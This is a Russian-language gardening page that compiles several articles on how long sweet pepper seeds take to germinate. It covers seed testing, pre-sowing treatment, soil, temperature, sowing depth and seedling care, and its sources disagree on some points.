4 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Сколько дней прорастает перец

Сколько дней прорастает перец

Время, в течение которого прорастает перец с момента высадки семян, зависят от множества факторов. Важную роль играют и сроки посева состояние почвы и сам посевной материал. Рассмотрим, сколько дней всходит перец после посева.

Сколько дней прорастает перец

О всхожести

Всхожесть — это количество всходов по сравнению с объемами высеянных материалов. От него зависит способность семян давать качественную рассаду, а в будущем высокий урожай. Стопроцентной всхожести не может быть. Тем более что сладкий болгарский перец – это капризная культура.

Семена овоща сохраняют всхожесть на протяжении 3-4 лет. Наибольший процент она показывает в первый год. Поэтому стоит покупать только свежий посевной материал. Также надо обратить внимание на фирму, которая их произвела. Предпочтение стоит отдать более известной и зарекомендовавшей себя.

Прорастают семена перца различных сортов по-разному. Для того, чтобы выбрать сорт, нужно внимательно изучить характеристики желаемых для посадки видов. Это существенно облегчит выбор и даст знания о том, чего следует ждать от них. Перед посевом семена проверяют и улучшают. Всхожесть 1-го класса должна составлять не менее 80% – это соответствует государственному стандарту. В продажу могут поступать и семена 2-го класса (показатель 60%).

Что влияет на всхожесть

Условия, от которых зависит всхожесть:

  • степень вызревания посевного материала;
  • уборка и сушка;
  • Последующее хранение.

Качество семян

Недозрелые и пересушенные зернышки теряют всхожесть. Также во влажном помещении они могут стать стерильными, так как влага способствует подниманию температуры внутри их. От перегрева теряется способность прорастать.

Температурные условия

Важными являются условия, в которых будут выращивать рассаду. Температура в помещении должна составлять 25-28˚С. При низких показателях всходы перца появляются очень медленно. Также плохо влияют сквозняки и резкие перепады температуры.

Почва

Почва должна быть рыхлой, воздухо- и влагопроницаемой. Ее температурные показатели мают находиться на уровне 20-25˚С. Если сосуд с грунтом стоит на холодном подоконнике, надо под него положить доску. Это делают для того, чтобы предупредить переохлаждение земли.

Воздухообмен

Почву нужно хорошо поливать, но умеренно. От избытка влаги воздух плохо поступает к зернышкам, они могут просто задохнуться. Качественный посевной материал тогда гибнет. Для свободного доступа воздуха надо делать частые проветривания помещения.

Глубина

Когда слишком долго не всходит перец, причина может крыться в глубине его посадки. Оптимальное расстояние рассчитывают так: размер семечки умножить на 3. Правильно углубленные семена могут переместиться ниже, если полив производят После посева, а не до него.

Обработка семян

Обработанный посевной материал всходит позже. Дражжирование и инкрустирование семян замедляет прорастание. После обработки их хорошо просушивают, а это влияет на всхожесть.

Если обеспечены все условия, то время необходимое для прорастания семян сладкого перца будет составлять около 7-15 дней. Иногда на проклюнувшихся ростках остается семенная оболочка, которую нельзя трогать, чтобы не повредить растение. Она отпадет сама.

Как проверить семена на всхожесть

Все семена проросли

Не стоит ждать, когда подойдет время посадки. Определить процент прорастания можно сразу после покупки. Тогда некачественный посевной материал успевают заменить. Вместе со всхожестью проверяют энергию прорастания – насколько равномерно появляются ростки.

Для этого зернышки помещают на влажную марлю. Удобно будет брать по 10 или 20 штук. Тогда легко будет посчитать процент проклюнувшихся семян. Он будет влиять на количество внесенных зернышек во время посадки. Если плохо всходят семена перца, их нужно сеять больше.

Также можно провести калибровку. Зернышки выстилают на бумаге, самые мелкие отбирают. Дальше сортируют – пустотелые отличают от наполненных. Для этого готовят такой раствор:

  • 2 ст. л. поваренной соли;
  • 1 ст. воды.

Зернышки опускают в жидкость. Через 7-10 минут некачественные всплывут. Те, что опустятся на дно, отбирают для высевания. Их извлекают, промывают пресной водой и просушивают. Калибровку производят непосредственно перед посевом.

Как ускорить прорастание семян

Чтобы улучшить качество посевного материала, можно провести ряд процедур. Они способствуют сокращению периода всходов, а значит всходит салатный перец намного быстрее, а сеянцы растут крепкие и здоровые.

Обеззараживание

Такая процедура необходима, если семена непротравленные. Дезинфицирование убывает разного рода грибки и бактерии, которые вызывают в будущем болезни у растений. В качестве жидкости для протравливания применяют 1-2% раствор марганцовки, в который окунают завернутые в марлю семечки. Через 20 минут их извлекают, промывают под проточной водой и просушивают.

Для обеззараживания используют покупные вещества. Можно взять препарат «Фитоспорин-М». Его в количестве 4 капель дают на стакан воды. Средство хорошо справляется с разными возбудителями заболеваний. Чтобы семена не потеряли посевные качества, не стоит проводить процедуру раньше чем за 2 дня до посадки.

Насыщение семян питательными элементами

Перец должен иметь силу для хорошего развития. Поэтому еще на этапе подготовки посевного материала улучшают их качество. Для этого используют как органические, так и химические средства:

  1. Зольная вода – 20 г древесного пепла добавляют в стакан воды, настаивают 1 день. Это вещество очень эффективное, ведь содержит много полезных микроэлементов. Обработку совершают на протяжении 5 часов.
  2. Куриное яйцо и сок алоэ – можно совмещать или применять отдельно, средством заливают зернышки.
  3. Препараты «Циркон», «Ивин», «Эпин» – используют по инструкции, которая прилагается.

Стимуляторы роста обеспечивают быстрые всходы. Растения отлично развиваются и имеют стойкий иммунитет к заболеваниям.

Прогревание

Зернышки оставляют на хорошо прогреваемом подоконнике или окунают в нагретую до 40˚С воду. Для поддержания постоянной температуры используют термос. Тогда семена болгарского перца быстрее прорастают, ведь при подогреве активизируются процессы роста.

Проращивание

Для прорастания потребуется намного меньше времени, если предварительно замочить посевной материал. Для этого берут марлю (бинт), складывают в несколько слоев. Сверху укладывают семена, разравнивают, укрывают. Смачивают водой. Отлично подойдет талая. Если ее нет, можно взять отстоянную.

Надо следить, чтобы марля всегда оставалась влажной. Для этого ее помещают в пластиковый сосуд с крышкой, которую открывают каждый день для проветривания. Температура в помещении, где содержится емкость, должна составлять 25-28˚С. Зернышки прорастают примерно через 7-10 дней, в зависимости от сорта.

Рассада перца: что действительно необходимо делать, а без чего можно обойтись

Сладкий перец выращивают на своих огородах далеко не все дачники, поскольку это не самая простая по агротехнике культура. Перец теплолюбив, имеет длительный вегетационный период. Вырастить его без стадии рассады можно очень редко: почти во всех регионах заботы о перце начинаются ещё зимой, а в марте семена высевают на рассаду.

Как выбрать семена и что с ними сделать в первую очередь

Уже к февралю у дачника должны быть готовы тара, грунт и семена для выращивания рассады перца. Многие опытные овощеводы из года в год пользуются своими семенами понравившихся им сортов, собирая их со спелых плодов в конце лета. Однако так можно поступать только в случае сортовых перцев: как бы ни были хороши гибриды первого поколения (обозначаемые как F1), брать от них семена бессмысленно: вырасти из таких семян может что угодно, таковы уж законы генетики.

Семена у перца крупные, работать с ними легко

В то же время многие современные гибриды настолько хороши как по урожайности, так и по устойчивости к неблагоприятным условиям, что всё больше огородников перестаёт экономить на семенах и покупает в магазине гибридные. Правда, в этом случае не стоит покупать семена от неизвестных фирм, хотя они и могут быть дешевле. В большинстве случаев семена гибридов выпускают уже готовыми к посеву, их подготовка силами дачника сводится к минимуму. Со своими семенами надо повозиться немного больше.

Впрочем, не всегда семена неизвестного происхождения не стоит использовать для посева, но тут уж — как повезёт! Пару раз на страх и риск высевал семена из купленных зимой в «Магните» понравившихся плодов, и результат был весьма неплохой.

Перед тем как начать что-либо делать с семенами, следует проверить их годность для посева. Семена перца сохраняют всхожесть в течение нескольких лет (при правильном хранении — до пяти), и дате, указанной на упаковке, обычно можно доверять. Свои же семена ещё зимой стоит проверить на всхожесть стандартным способом. Десяток семян (можно и меньше) складывают в тряпочку, хорошо смачивают её водой и помещают в любой неплотно закрытой ёмкости (удобнее всего — в чашке Петри) в тёплое место (например, около батареи), чтобы температура была не ниже 25 о С. Следят за тем, чтобы тряпочка не пересыхала, и проверяют состояние семян. Если через неделю большинство из них проклюнулись, семена можно использовать для посева.

Проращивание семян и проверку всхожести удобно проводить и на губке

Обработка и проращивание семян перед посадкой

Хорошие семена перца можно высевать на рассаду «как есть», прямо сухими. Сам я уже много лет только так и поступаю, поскольку опыт показывает, что большинство из описываемых в многочисленных статьях процедур лишь зря отнимают время, которого и так очень мало. Впрочем, навязывать своё мнение — не лучший подход, тем более что для семян сомнительного качества действительно желательны некие действия перед их посевом.

Из всех предлагаемых операций существенное значение в ряде случаев могут иметь:

Выполнять следует только то, что действительно покажется необходимым.

Калибровка

Когда это делать? Уже перед посевом, когда приготовлено всё, что для этого требуется. Семена у перца довольно крупные, и отобрать щуплые экземпляры можно даже вручную, с помощью пинцета. Их лучше не сажать. Хорошие производители даже не кладут в пакетики негодные семена. Ещё проще провести калибровку по плотности. Для этого почти все источники советуют использовать солёную воду (примерно ложку соли на литр воды), но можно прекрасно обойтись и чистой водой: плотность у неё ненамного ниже, чем у раствора поваренной соли. Семена, не утонувшие в течение 5–7 минут (при периодическом помешивании) лучше выбросить. Скорее всего, они тоже взойдут, но растения будут слабыми.

Обеззараживание

Обеззараживание необходимо в случае семян от своего урожая. Проводят его просто: семена высыпают в тёмный раствор марганцовки и держат его там 20–30 минут. Совет приготовить 1%-й раствор хорош, но как в большинстве случаев хозяин будет брать навеску препарата в 1 г или менее? Всё здесь очень приблизительно, но пользоваться светло-розовым раствором бессмысленно. Важно после обеззараживания как следует отмыть семена чистой водой. Кстати, зачем их перед этим калибровать? Тоже лишняя операция: негодные семена не утонут и в растворе марганцовки.

Раствор марганцовки такой концентрации брать для дезинфекции семян бесполезно: надо приготовить очень тёмный раствор

Вместо марганцовки можно пользоваться 3%-м раствором перекиси водорода, но его используют тёплым: при температуре около 35 о С, держат семена в таком растворе 10–15 минут. Другие, более экзотические, препараты специально для этой цели покупать ни к чему.

Закаливание

Если выращивание перца предполагается в теплице, то закаливание семян — излишняя мера. Если же в открытом грунте — полезная, хотя и не все специалисты по овощеводству горячо поддерживают это. Но, по крайней мере, не навредит. Чтобы закаливание имело смысл, надо дождаться, пока семена набухнут. Для этого их держат во влажной тряпочке и периодически проверяют: как только самые первые проклюнутся, все семена отправляют в холодильник.

Есть разные режимы закаливания. Пожалуй, оптимальный состоит в чередовании температур: 12 часов в холодильнике, 12 часов при комнатной температуре, после чего ещё два раза таким же образом. После этого можно проводить посев.

Другие процедуры

Можно встретить множество советов по дополнительной обработке семян перца. Всё это из серии «когда слишком много свободного времени». Ещё раз можно повториться: качественные семена взойдут и дадут крепкую рассаду вообще без обработки. Хотя замочить их и не очень сложно, но даст эта операция выигрыш в сроках появления всходов на 1–2 дня, и больше ничего. Прогревание у батареи, столь важное в случае семян многих сортов огурцов (увеличивает количество женских цветков) в случае перца абсолютно бессмысленно.

Из этой же области и совет использовать барботирование — продувание воздухом от компрессора воды, в которую пускают плавать семена. Эта мера существенно ускоряет появление всходов моркови, петрушки, сельдерея — культур, семена которых покрыты плотной эфирной оболочкой. Замачивание с продуванием позволяет разрушить её и вдвое ускорить прорастание семян. К перцу это не относится! И не стоит искать источник ультразвука, ведь и про это тоже можно иногда прочитать.

Некоторые прилежные огородники замачивают семена перца в препаратах, ускоряющих всхожесть и усиливающих иммунитет растений, например, в Эпине. Польза от этого, конечно, есть, но велика ли? Если очень хочется, проще и дешевле воспользоваться соком столетника (алоэ). Он действительно полезен, повышает адаптационные способности растений, защищает от инфекций. Но подготовить препарат надо правильно. Для этого алоэ держат неделю в темноте при низких положительных температурах, лишь затем отжимают сок из листьев. Сок смешивают пополам с водой и выдерживают в нём семена в течение суток.

Алоэ — прекрасный природный иммуномодулятор, но использовать его надо правильно

Посадка семян перца

Подготовленные семена высаживают на рассаду в комнатных условиях. В отличие, например, от капусты, которой требуется невысокая температура, для рассады перца в большинстве городских квартир условия вполне комфортные.

В какие сроки проводят посев

Даже в Болгарии перец выращивают в основном через рассаду, но это — чтобы раньше получить урожай. У нас без рассады обойтись трудно, но в сроках посева семян у специалистов появились разногласия.

Если совсем недавно считалось, что сеять надо во второй половине февраля, самое позднее — до 8 марта, то теперь господствует точка зрения, что спешить не надо. Большинство огородников переходит на посев семян в середине марта, чем уменьшает себе головную боль, связанную с недостатком света и тепла в феврале.

Для тепличного получения урожая закончить с посевом нужно в первой половине марта, иначе не будет никакого выигрыша во времени от теплицы, проще в мае купить рассаду. Для открытого грунта в средней полосе семена в стаканчики можно посеять вплоть до конца марта: ведь в грядку рассаду переносят только в начале лета. Если есть возможность посадить рассаду в мае (под временное укрытие), посев проводят раньше. Ориентир простой: посев — примерно за 2,5 месяца до высадки рассады. Это правило работает во всех климатических регионах.

Подходящая почва

Для выращивания десятка растений проще купить грунт для перца в магазине. При самостоятельном его приготовлении надо получить воздухо- и водопроницаемую смесь с большой концентрацией питательных элементов и нейтральной кислотностью. Для этого можно взять компост, речной песок и дерновую землю в соотношении 2:1:1 и добавить немного золы. Готовую смесь обязательно проливают розовым раствором марганцовки за день до посева семян.

Вместо перегноя подойдёт компост, вместо дерновой земли — любая плодородная, но не из грядки с паслёновыми культурами.

Перец не любит пикировку, поэтому обычно семена сеют сразу в индивидуальные стаканчики вместимостью от 300 мл. Впрочем, предварительный посев в общую коробку возможен, но рассаживают сеянцы в стаканчики (в фазе 2–3 настоящих листочков) аккуратно, с комом земли, не нарушая корней.

Торфяные горшочки — лучшая тара для рассады перца

Глубина заделывания семян

В каждый стаканчик кладут дренажный слой (1 см крупного песка), потом насыпают приготовленный грунт. Высевают семена на глубину 1,5–2 см. Если они уже проклюнулись, то по одному; сухие семена, если нет дефицита, лучше по два: потом лишние растения удаляют. Почву хорошо поливают тёплой водой и накрывают стаканчики стеклом или плёнкой. Ежедневно убирают со стекла конденсат и слегка проветривают содержимое стаканчиков.

Условия прорастания

Перец взойдёт при любой температуре выше 20 о С, но это может занять много времени. Оптимальна температура 24…28 о С. Свет при этом не обязателен, но дело в том, что сразу после появления «петелек» он нужен, и интенсивный. Если есть опасность прозевать всходы, лучше срезу поставить стаканчики в тепло и на свет.

Через сколько дней появляются всходы

При указанной температуре даже сухие семена большинства сортов прорастают через 7–10 дней, а всходов от пророщенных можно ожидать уже на четвёртые сутки. Важно не дожидаться появления всех всходов: после появления первых же росточков весь поддон со стаканчиками переносят в хорошо освещённое место с температурой 18–20 о С (ночью на 3–4 градуса ниже) и держат так дней пять.

Первая же «петелька» — сигнал к понижению температуры

Уход за всходами

Если в течение первых 5–6 дней не было слишком жарко и темно, сеянцы не вытянулись, дальше всё просто: рассаде нужен самый обычный уход. Пересадка проводится только в случае предварительного посева семян в общую коробку или если были взяты маленькие стаканчики и рассада перерастает, а в грядку сажать её ещё не позволяет погода.

Полив и подкормка

Рассаду перца поливают водой с температурой около 25 о С. Поливы проводят нечасто, 1–2 раза в неделю (в зависимости от условий), не допуская пересыхания грунта в стаканчиках. При поливах важно не замачивать листья, лить воду из маленького чайничка под корень. Время от времени в воду добавляют немного марганцовки (до светло-розового окрашивания).

Часто можно обойтись и без подкормок, но принято пару раз рассаду подкормить. Можно ограничиться настоем древесной золы. Первый раз подкормку вносят при образовании 4-го листка, второй — за 10–15 дней до высадки рассады в грядку. До подкормки и после неё необходим полив чистой водой.

Соблюдение температурного и светового режима

Всё время, кроме первой недели, надо стараться поддерживать температуру 23–26 о С днём и 18–20 о С — ночью. Если подоконник не направлен на север, заботиться о подсветке в марте-мае не надо. На северном подоконнике стоит оборудовать фитолампы, поскольку света от солнца рассаде может не хватать. Продлевать световой день не надо, речь может идти только об интенсивности света.

Подсветка нужна только в случае явного полумрака

Важно не забыть о закаливании рассады. За неделю до высадки в грядку её приучают к свежему воздуху, вынося ненадолго на балкон (сначала на 10–15 минут, затем до 3–4 часов). В это время не стоит и сильно поливать рассаду, чтобы она привыкала к трудностям. Высадка в грядку без укрытия возможна с наступлением настоящей летней погоды: почва должна прогреться до 14 о С, ночные температуры воздуха должны держаться как минимум на таком же уровне. На широте Москвы высадка в грунт раньше начала июня опасна.

Видео: способы посева семян перца на рассаду

Проблемы

Огородники со стажем не считают выращивание перечной рассады большой проблемой, у начинающих могут быть неприятности.

Семена не всходят

Если при оптимальной температуре семена не взошли и через 2 недели, надо скорее повторять посев: что-то пошло не так. Этого не может случиться при хороших семенах и правильном грунте. Поэтому для повторного посева надо проверить и то, и другое.

Сеянцы не растут

Сеянцы могут прекратить рост, если им холодно. Если проблема не в температуре, будет заметно что-то ещё. Так, при недостатке влаги листья будут увядать, при недостатке питания — менять окраску. Чаще всего проблема устранима, если дело не зашло слишком далеко. Надо срочно поправить условия: полить, подогреть, подкормить.

Сеянцы желтеют

Пожелтение листьев — сигнал плохой, но причин может быть много. Такое случается и при недостатке влаги, и при её избытке, при недостатке света или азота. Желтеют листья и от некачественного грунта (слишком тяжёлого или, наоборот, песчаного). При недостатке микроэлементов (марганца, цинка, железа) пожелтение начинается с макушки. Вредители редко забираются в квартиру, если только не были занесены с почвой. Это же касается и болезней. Поэтому причину пожелтения листьев надо искать в промахах хозяина и пытаться её устранить.

Вырастить рассаду перца не очень сложно, но есть нюансы. Они связаны как с правильной подготовкой семян и грунта к посеву, так и с последующим соблюдением всех условий выращивания. Начинающий огородник может где-то ошибиться, но с опытом выращивание рассады перестаёт быть сложным делом.

Сколько дней всходят семена перца: 10 факторов, влияющее на сроки прорастания семян

Как только не называют культуру: и “тугодумом”, и “туговсхожим” за длительное прорастание. А когда терпят фиаско с рассадой, часто винят всех – от производителя семян до самого перца. Сколько дней всходит перец, когда ожидать всходы, что влияет на скорость прорастания. Как ускорить процесс, и что делать, если сроки прошли, а всходов все нет.

Сколько дней всходят семена перца: факторы и сроки

Семена перца всходят через 5-6 и до 22 дней, и зависят в первую очередь от температуры воздуха.

  • При температуре +25…+29 о С всходы появятся от 5-7 до 10 дней;
  • При t +23…+25 о С до 2-3 недель;
  • При t ниже 21 о С всходы могут загнить и погибнуть.

А еще? А факторов на самом деле много. В том числе и неожиданных.

От чего зависит скорость прорастания: 10 причин, почему нет всходов

Сколько дней всходит перец, мы выяснили. А от чего зависит скорость его прорастания: коротко и тезисно.

1. Температура воздуха

Теплолюбивая культура быстрее всего прорастает при +28…+30 о С через 10 дней. На какой день всходит перец при температуре воздуха ниже +18…+20 о С и грунта ниже +17 о С? Вероятность прорастания сеянцев минимальна.

2. Температура грунта

Через сколько взойдут перцы? Точные сроки появления всходов в зависимости от причин: температура воздуха и грунта, влажность и другие: советы агрономов.

Часто не измеряют температуру грунта, ориентируются лишь на t воздуха. А ведь это главное: выставляют на холодный подоконник, любимое место рассады в домашних условиях, возле холодных стекол. На подоконнике рассада? Подложите пенопласт. И подальше от стекла ее.

Температура грунта должна быть от +28…+30 о С, и не менее +18…+20 о С на стадии прорастания.

Через сколько дней взойдет перец при t грунта ниже +18 о С? Может не взойти.

А сколько дней всходит перец при t грунта +20…+23 о С? По отзывам, порядка 2-х недель и до 20 дней. Любое отклонение от оптимальных условий вызовет затягивание сроков появления всходов.

3. Уровень освещенности

Нельзя содержать рассадный ящик в полумраке и при подсветке. Нужен свет для прогрева и инсоляции проростков, чтобы они тянулись к источнику света. Во втором избыток освещения ведет к осветлению корешков проростка, что грозит в последствии вытягиванием. Не случайно рекомендуют рассаду содержать в непрозрачных емкостях.

4. Уровень влажности

Рассадные емкости помещают под пленку для повышения влажности. Но не для образования конденсата. Для его избежания важно проветривание: пленку ежедневно снимают на 20-30 мин.

Избыток влаги также губителен: сеянцы не поливают, а высевают во влажный пролитый субстрат со стекшей в поддон водой: иначе сгниют.

5. Глубина

Глубина заделки прямо влияет на скорость прорастания. Менее 0.5-0.8 см чревата низкой всхожестью, ослабленными всходами.

Почему? Грунт помогает проросткам освободиться от семенной оболочки.

А еще семена “поднимаются” на поверхность, зародыш осветляется, этиолируется. На свету проращивают лишь очень мелкие семена. Остальные на рассеянном мягком свету днем, в темноте ночью.

Для прорастания, для снятия семенной оболочки нужно трение о слои грунта, иначе семядоли не смогут полностью раскрыться.

Корешок, прорастая, делает петлю – затем появляются те самые петельки, которые мы видим на поверхности.

Он “вытягивает” семядоли из грунта, но при его малом слое извлекает их на поверхность вместе с семенем. Это в лучшем случае: в худшем семена остаются в грунте, и загнивают.

А главное – высокий слой почвосмеси, до 2 см – гарантия естественного отбора.

Взойдут самые сильные семена, с достаточным запасом питательных веществ для дальнейшей жизнедеятельности. И сними не будет хлопот, и будет добрым урожай.

6. Состав грунта

Умерено рыхлый субстрат и легкий – гарантия, что перец взойдет в срок. Глинистый, тяжелый не подходит. Если в составе огородная земля, добавляет песок, вермикулит. Торф (даже низинный) добавлять не стоит: он подкисляет.

А как же торфяные стаканчики? А специалисты именно для семян перца их очень не рекомендуют. Для других культур – очень.

7. Уплотнение

Вопреки всем профессиональным советам, семена перца таки нужно уплотнять – слегка: тогда они быстрее прорастут (парадокс) благодаря силе трения, “снимающей” оболочку семени. И сама оболочка не поднимется на поверхность.

А что делать, если проросток (сеянец) появился на поверхности с оболочкой, как снять?

Чтобы она не травмировала семядоли, капните из пипетки или шприца небольшую каплю теплой воды: 2-3 раза. Оболочка быстро размягчится, и ее можно легко снять, не повреждая сеянец.

Важно! Перед тем, как придерживать сеянец, охладите руки: от теплых рук возможен ожог стебелька – вот такая неожиданность.

8. Предпосевная подготовка

Вы удивитесь, и даже возмутитесь: проращивать не нужно. Это не ускорит процесс, напротив замедлит. Не случайно специалисты ведущих агрофирм рекомендуют высевать сухие семена.

И не только потому, что размывается защитная оболочка семени: при всяко-разных танцах с бубном, при полоскании семян в воде, кипятке вымываются питательные веществ семени.

Да, вместе с защитным слоем. Спешите? Высевайте раньше.

Так считает д.-р Миттлайдер – тот самый, так считают многие отечественные специалисты. Максимум – кратковренная стратификация в холодильнике или просто помещение в чуть смоченную (!) ткань или поролон, на ватный диск: но не до появления проростков – им не нужен свет. До раскрытия створок семени и до появления ростка длиной 0.2 мм, не более.

Высокие температуры при прогревании – откажитесь от любых экспериментов для повышения всхожести с термообработкой.

Не варите посадочный материал, это вредно. Низкие температуры при закаливании семян: теплолюбивая культура в стратификации не нуждается. Разве что до +5 о С на 1-2 ч.
Низкая температура грунта, низкая t воздуха.

9. Свежесть семян

Чем дольше хранится посевной материал, тем больше времени уходит на пробуждение ростка.

10. Вы попали, или вам повезло

Если семена не взошли, перечисленные выше причины отпадают, а семена покупные, значит виноват некачественный посадочный материал. Забудьте о производителе. А если свои собственные, вам повезло: вы не посадили зараженные, или нежизнеспособные семена, полученные от нижних последних плодов. И вы будете знать свои ошибки.

Что делать, если семена перца не прорастають

Если время идет, а всходов нет, перец не прорастает, что делать? Меры спасения семян: как попытаться добиться всходов: овощеводы советуют.

  • Привести к оптимальным показателям температуру воздуха и грунта.
  • Контраст температур: смена охлаждения и тепла, возможно, простимулирует прорастание. Вынесите рассадный ящика в прохладное место (до +4…8 С) на пару часов, затем в тепло. Зачем? Это последний шанс: контраст температур стимулирует прорастание за счет превращения крахмалов семени в сахара, дающих энергию роста.
    Разведите любой стимулятор роста (Эпин, янтарная кислота и прочие) и вспрысните из распылителя. Мера крайняя, для очистки совести: поливать, проливать посевы не желательно, а для эффективности материал должен быть погружен в препарат.
  • Вынести рассаду на самое светлое место, но не более чем на 12-14 ч.
  • При подсыхании почвы следует увлажнить ее из пульверизатора. Поливом из лейки можно размыть всходы.
  • При переувлажнении почвы важно обеспечить проветривание. Пленку с емкости снимают, поверхность грунта неглубоко и осторожно рыхлят. Это обеспечит приток воздуха к семенам и предотвратит их гибель.

А если ничего не помогло? Пересеять, и радоваться: если бы после всех злоключений несчастная рассада перца наконец взошла, это была бы не радость в доме. А начало хлопот и разочарований: слишком долгие всходы на старте – большие хлопоты. именно поэтому, если семена перца не всходят, да и других культур, опытные овощеводы не стараются ничего предпринять: природа сама выбирает. Увы, но факт.

Про перец: это интересно

А чтобы она не ошиблась с выбором – не будем ей мешать. Пусть растет рассада крепкой, перец сладким: пусть будет добрым урожай!

Сколько дней перец всходит на рассаду: от чего зависит всхожесть

Перец — достаточно капризная культура, требующая внимательного ухода. Ещё в самом начале необходимо правильно подготовить семена и грунт, точно соблюдать сроки посева, а потом осуществлять правильный уход. От последовательности действий и качества материала зависит, сколько дней всходит перец на рассаду, и как будут развиваться растения в будущем.

Когда появляются первые всходы перца

Каждое растение должно прорастать в отдельной ёмкости, чтобы не спутывалась корневая система

Точные сроки прорастания семян перца зависят от сорта. Если предпосадочная подготовка была проведена правильно, всходы появятся через 6–14 дней. Чем свежее и качественнее были семена, тем дружнее они прорастают. Через 15 дней должны проклюнуться все ростки.

Первые листочки очень нежные, поэтому малейшее воздействие может травмировать их.

Нельзя пытаться убрать оболочки от семян, остающиеся на ростках. В процессе разворачивания листков шелуха отпадёт самостоятельно, принудительное удаление повредит рассаду.

Плохая всхожесть: в чём причины

Рассада перца может быть слабой, если растениям не хватает солнечного тепла

Если ростки появляются позже положенного, выглядят слишком слабыми и хрупкими, нужно разобраться, что именно в процессе подготовки было сделано не так.

Среди основных причин плохой всхожести:

  • слишком старые или неправильно хранящиеся семена;
  • тяжёлая или закислённая почва;
  • семена не замочены перед посадкой;
  • недостаточный полив;
  • чрезмерное заглубление;
  • низкая или слишком высокая температура в комнате.

Как помочь перцу

Чтобы всходы перца проявили себя быстрее, ёмкость с будущей рассадой накрывают плёнкой

Перец считается довольно требовательной культурой. Для успешного прорастания нужно отобрать полноценные семена: их перебирают перед посевом, обрабатывают слабым раствором марганцовки, а затем заворачивают во влажную хлопчатобумажную ткань для наклёвывания. Такая операция поможет отбраковать нежизнеспособный посадочный материал на начальной стадии.

Семена высевают в просторные контейнеры, а затем пикируют их в индивидуальные торфяные горшочки или пластиковые ёмкости.

Грунт должен быть лёгким и питательным, с нейтральной или слабощелочной реакцией. Слишком кислые почвы перец не любит. Идеальная почвосмесь: дерновая или садовая земля с торфом или перегноем. В субстрат полезно добавить немного берёзовой золы.

Очень важно хорошо увлажнять грунт непосредственно перед посадкой. Семена нельзя слишком заглублять. После посева ёмкость закрывается плёнкой и помещается в тепло для прорастания.

Если всходы плохо проклёвываются, стоит переместить ящик в тёплое, хорошо освещённое место. Почва не должна пересыхать, но заливать её тоже нельзя. Поливать посадки удобно пульверизатором: рассеянные струйки вода не размывают грунт, влага проникает максимально глубоко, при этом семена не заглубляются.

Ёмкости с рассадой нужно держать в тепле, однако категорически запрещено помещать их непосредственно на батарею. Слишком высокие температуры погубят семена и перцы не прорастут. Лучше поставить ящик на окно, защитив его от холодного воздуха полиэтиленовой плёнкой.

При отсутствии яркого солнечного света придётся организовать подсветку. Недостаток освещения сделает рассаду хилой и слабой.

Перцы не любят, когда тревожат их корни. Нельзя пытаться раскапывать посеянные семена, интенсивно рыхлить почву. Пикировка тоже замедляет рост, поэтому её лучше избегать. Подросшие растения перемещают в открытый грунт или теплицу методом перевалки.

Начинающим огородникам лучше выбрать высокоурожайные гибриды средних сроков спелости: они менее требовательные, саженцы всходят быстрее. Если рассада плохо развивается, помогут дополнительная подсветка и дозированный полив.

Через сколько при выращивании в домашних условиях всходит перец на рассаду?

Перец относится к светолюбивым овощам, которым для успешного произрастания нужна определенная температура. Здоровая и крепкая рассада – залог получения хорошего урожая перца. Однако для того, чтобы вырастить хорошую рассаду, необходимо потратить много времени и приложить определенные усилия.

Сколько всходит рассада перца, помидор и баклажанов:

Первые всходы из семян — через сколько дней?

Оптимальное время посадки семян перца на рассаду – средина февраля. Основные подготовительные действия при посеве семечек:

  • Температура не менее 23-25 градусов Цельсия;
  • Правильная обработка посадочного материала – обеззараживание в марганцовке, замачивание в стимуляторах роста;
  • Наличие легкого и питательного грунта.

Первые всходы молодых перчиков обычно появляются через 5-16 суток после высадки семечек.

Проклевывающиеся росточки внешне представляют собой петельку из стебелька. Немного позже появляются семядольные листики, на которых очень часто находится семенная оболочка. Многие начинающие огородники пытаются убрать оболочку самостоятельно. Этого делать не следует, поскольку в процессе роста перец самостоятельно справится с семенной оболочкой, а ее удаление может привести к повреждению нежного ростка.

Когда можно снимать пленку со сладкого перца?

Полиэтиленовая пленка при выращивании рассады перца играет роль мини-парника. После того, как семечки поместят во влажный грунт, посадки необходимо накрыть тонким полиэтиленом. Для проращивания посадочный материал необходимо поместить в теплое помещение с температурой не ниже 23 градусов Цельсия.

После того, как на поверхности емкостей появятся молодые ростки, полиэтиленовую пленку убирают вначале на несколько минут. По мере роста всходов время снятия полиэтилена увеличивается. Таким образом, молодые перцы привыкают к условиям окружающей среды.

Как выращивать правильно — уход за проклюнувшимися росточками

После появления всходов основные правила ухода заключаются в своевременном поливе и регулярном освещении. Эти два фактора имеют большое значение при выращивании рассады перца для формирования здоровых растений, дающих в будущем хороший урожай.

Влажность почвы нужно регулярно и тщательно контролировать. Овощная культура любит влагу, но переувлажнение грунта губительно для молодых растений, как и пересыхание почвы.

Перец – овощная культура короткого светового дня, поэтому для растений необходимо интенсивное освещение. При этом продолжительность освещения для культуры должна составлять не менее 10-12 часов.

Опытные овощеводы рекомендуют после 18:00 накрывать рассаду светонепроницаемыми ящиками. Эта процедура обеспечит молодым растениям:

  • Иммунитет к различным заболеваниям;
  • Более быстрое привыкание к новому месту произрастания;
  • Устойчивость к колебаниям температуры.

Почему не растет рассада болгарского перца?

Часто возникает ситуация, что при видимом соблюдении правил посадки семена не взошли. Причинами могут быть следующие факторы:

  • Неправильная подготовка грунта. Почва может быть слишком тяжелой для перца или закисленной;
  • Низкое качество семечек. Посевной материал капризной овощной культуры плохо сохраняет всхожесть, поэтому его нельзя закупать впрок и хранить их на протяжении длительного времени;
  • Пересыхание почвы. В этом случае даже взошедший посадочный материал может погибнуть при недостатке жидкости;
  • Несоблюдение необходимой температуры для прорастания семян.

При высокой влажности земли и отсутствии вентиляции всходы погибают.

Плохо растет, что делать?

Причина плохого роста рассады заключается в типичных ошибках, допущенных при уходе:

  • Неправильный режим полива. Перец – влаголюбивое растение, которое не переносит пересыхания грунта;
  • Недостаточное освещение. При отсутствии надлежащего освещения саженцы вытягиваются и ослабевают. Поэтому при сумрачной и пасмурной температуре рассаду необходимо подсвечивать фотолампами;
  • Неправильный режим питания рассады. Для исправления ситуации молодые перцы подкармливают гуматом калия или специальными жидкими минеральными комплексами.

Почему гибнет?

Существует несколько причин увядания и гибели саженцев:

  • Покупка почвы в неспециализированных магазинах. В фасованном необеззараженном грунте из теплиц могут содержаться возбудители различных болезней и грибков;
